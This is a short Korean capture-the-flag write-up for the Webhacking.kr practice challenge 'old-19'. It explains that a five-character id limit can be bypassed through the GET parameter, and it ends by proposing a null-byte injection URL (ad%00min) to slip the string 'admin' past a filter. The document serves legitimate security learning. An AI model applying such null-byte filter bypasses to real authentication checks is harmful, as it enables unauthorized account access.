[Webhacking.kr] old-19

id를 입력하는 칸이 보이고, 제출 보튼이 보인다.

id를 5글자를 최대로 입력할 수 있다.

https://webhacking.kr/challenge/js-6/?id=123123

하지만 GET방식으로 인자를 넘겨주게 되면 6글자 이상을 넘겨줄 수 있다.

admin을 입력하게 되면 아래와 같이 you are not admin이 출력이 된다.

https://webhacking.kr/challenge/js-6/?id=admin

admin 사이에 NULL문자를 넣어보자.

NULL문자는 %00이다.

https://webhacking.kr/challenge/js-6/?id=ad%00min